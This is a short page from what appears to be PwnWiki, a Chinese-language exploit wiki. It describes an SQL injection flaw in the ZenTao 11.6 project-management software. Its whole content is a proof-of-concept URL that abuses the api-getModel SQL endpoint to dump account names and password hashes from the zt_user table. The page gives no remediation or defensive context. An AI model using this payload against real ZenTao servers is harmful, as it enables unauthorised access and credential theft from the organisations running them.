禅道 11.6版本 SQL注入漏洞

From PwnWiki

Revision as of 10:25, 31 May 2021 by Xc1ym (talk | contribs) (新建禅道11.6版本SQL注入)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

POC

http://xxx.xxx.xxx.xxx/api-getModel-api-sql-sql=select+account,password+from+zt_user

Retrieved from "https://pwnwiki.com/index.php?title=禅道_11.6版本_SQL注入漏洞&oldid=3731"